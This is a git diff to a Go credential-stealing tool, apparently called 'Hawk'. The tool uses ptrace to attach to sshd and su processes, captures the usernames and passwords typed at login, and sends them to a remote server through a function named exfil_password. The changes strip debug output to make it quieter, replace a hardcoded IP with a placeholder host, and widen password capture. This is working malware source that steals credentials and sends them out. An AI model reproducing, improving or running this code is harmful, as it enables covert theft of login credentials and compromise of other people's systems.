diff --git a/main.go b/main.go
index f11c7dd..2d74e2b 100644
--- a/main.go
+++ b/main.go
@@ -52,7 +52,7 @@ func exfil_password(username, password string) {
 if err != nil {
 return
 }
- serverURL := "http://10.159.76.35:6969/"
+ serverURL := "http://fill:6969/"
 values := url.Values{}
 values.Set("hostname", hostname)
 values.Set("username", username)
@@ -75,7 +75,6 @@ func main() {
 if !processedFirstPID {
 processedFirstPID = true
 } else {
- fmt.Println("SSHD process found with PID:", pid)
 go traceSSHDProcess(pid)
 processed_pids = append(processed_pids, pid)
 }
@@ -84,7 +83,6 @@ func main() {
 if !processedFirstPID {
 processedFirstPID = true
 } else {
- fmt.Println("SU process found with PID:", pid)
 go traceSUProcess(pid)
 processed_pids = append(processed_pids, pid)
 }
diff --git a/ssh_tracer.go b/ssh_tracer.go
index 59ce0c5..1355ef5 100644
--- a/ssh_tracer.go
+++ b/ssh_tracer.go
@@ -5,18 +5,16 @@ import (
 "io/ioutil"
 "regexp"
 "syscall"
+ "unicode"
 )
 func traceSSHDProcess(pid int) {
- fmt.Printf("[Hawk] SSH Connection Identified on pid: %d.\n", pid)
-
 err := syscall.PtraceAttach(pid)
 if err != nil {
 return
 }
 defer func() {
 syscall.PtraceDetach(pid)
- fmt.Printf("[Hawk] Detached from pid: %d.\n", pid)
 }()
 var wstatus syscall.WaitStatus
@@ -35,7 +33,6 @@ func traceSSHDProcess(pid int) {
 var regs syscall.PtraceRegs
 err := syscall.PtraceGetRegs(pid, ®s)
 if err != nil {
- fmt.Println("PtraceGetRegs:", err)
 syscall.PtraceDetach(pid)
 return
 }
@@ -53,14 +50,10 @@ func traceSSHDProcess(pid int) {
 if len(matches) == 2 {
 username = string(matches[1])
 }
- var password = string(buffer)
- valid := regexp.MustCompile(`\x00\x00\x00[^\n]*\f$`).MatchString(password)
- if !valid {
- fmt.Printf("Username: %q, Password %q\n", username, password)
- go exfil_password(username, removeFirstFourBytes(password))
+ var password = removeNonPrintableAscii(string(buffer))
+ if len(password) > 2 && len(password) < 250 {
+ go exfil_password(username, removeNonPrintableAscii(password))
 }
- } else {
- fmt.Printf("rdi: %d, rax: %d\n", regs.Rdi, regs.Orig_rax)
 }
 }
 }
@@ -72,9 +65,14 @@ func traceSSHDProcess(pid int) {
 }
 }
-func removeFirstFourBytes(input string) string {
- if len(input) < 4 {
- return ""
+func removeNonPrintableAscii(input string) string {
+ var resultBuilder []rune
+
+ for _, char := range input {
+ if unicode.IsPrint(char) && char >= 32 && char != 127 {
+ resultBuilder = append(resultBuilder, char)
+ }
 }
- return input[4:]
+
+ return string(resultBuilder)
 }
diff --git a/su_tracer.go b/su_tracer.go
index baf8fc9..65f8ebc 100644
--- a/su_tracer.go
+++ b/su_tracer.go
@@ -9,13 +9,11 @@ import (
 )
 func traceSUProcess(pid int) {
- fmt.Printf("[Hawk] SU Connection Identified on pid: %d.\n", pid)
 err := syscall.PtraceAttach(pid)
 if err != nil {
 return
 }
 defer func() {
- fmt.Printf("[Hawk] Detached from pid: %d.\n", pid)
 syscall.PtraceDetach(pid)
 }()
 var wstatus syscall.WaitStatus
@@ -34,11 +32,10 @@ func traceSUProcess(pid int) {
 var regs syscall.PtraceRegs
 ptrace_err := syscall.PtraceGetRegs(pid, ®s)
 if ptrace_err != nil {
- fmt.Println("PtraceGetRegs:", ptrace_err)
 syscall.PtraceDetach(pid)
 return
 }
- if regs.Orig_rax == 0 && regs.Rdx == 511 && regs.Rdi == 0 {
+ if regs.Orig_rax == 0 && regs.Rdi == 0 {
 readSyscallCount++
 if readSyscallCount == 3 {
 buffer := make([]byte, regs.Rdx)
@@ -64,14 +61,11 @@ func traceSUProcess(pid int) {
 }
 return true
 }(password) {
- fmt.Printf("Username: %q, Password %q\n", username, password)
 go exfil_password(username, password)
 }
 }
 }
- }
-
 err = syscall.PtraceSyscall(pid, 0)
 if err != nil {
 return